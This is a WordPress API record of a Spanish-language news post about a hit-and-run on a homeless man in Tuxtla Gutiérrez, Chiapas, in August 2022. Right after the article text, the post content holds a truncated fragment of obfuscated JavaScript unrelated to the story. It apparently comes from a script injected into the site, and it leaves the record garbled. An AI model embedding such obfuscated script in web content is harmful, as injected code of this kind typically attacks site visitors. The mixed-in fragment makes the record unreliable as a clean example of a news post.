{"id":4047,"date":"2022-08-01T23:59:45","date_gmt":"2022-08-01T23:59:45","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=4047"},"modified":"2022-08-01T23:59:46","modified_gmt":"2022-08-01T23:59:46","slug":"atropellan-a-indigente-en-la-avenida-central","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=4047","title":{"rendered":"Atropellan a indigente en la Avenida Central"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"577\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013-1024x577.jpg\" alt=\"\" class=\"wp-image-4049\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013-1024x577.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013-1536x865.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/08\/IMG-20220801-WA0013.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudadano, 1 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un indigente fue atropellado este lunes cuando circulaba en la Avenida Central, entre octava y Novena Poniente, a la altura del Parque de la Marimba de Tuxtla.De acuerdo con los datos oficiales, este hecho ocurri\u00f3 cuando el sujeto intentaba cruzar la  transitada v\u00eda en el sentido de Sur a Norte.El responsable de acuerdo con los testigos, fue el conductor de un compacto de color rojo el cual escap\u00f3 rumbo a la zona Poniente de la ciudad.Fueron los mismos transe\u00fantes los que apoyaron al hombre y evitar as\u00ed que fuera m\u00e1s lastimado.Los socorristas de la Cruz Roja, atendieron al lesionado y lo trasladaron a un nosocomio para su atenci\u00f3n m\u00e9dica especializada debido a que presentaba una herida en la pierna derecha.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudadano, 1 de agosto del 2022. Tuxtla Guti\u00e9rrez. &#8211; Un indigente fue atropellado este lunes cuando circulaba en la Avenida Central, entre octava y Novena Poniente, a la altura del Parque de la Marimba de Tuxtla.De acuerdo con los datos oficiales, este hecho ocurri\u00f3 cuando el sujeto intentaba cruzar la transitada v\u00eda en &hellip;<\/p>\n","protected":false},"author":2,"featured_media":4049,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-4047","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4047","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4047"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4047\/revisions"}],"predecessor-version":[{"id":4050,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/4047\/revisions\/4050"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/4049"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4047"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4047"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4047"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}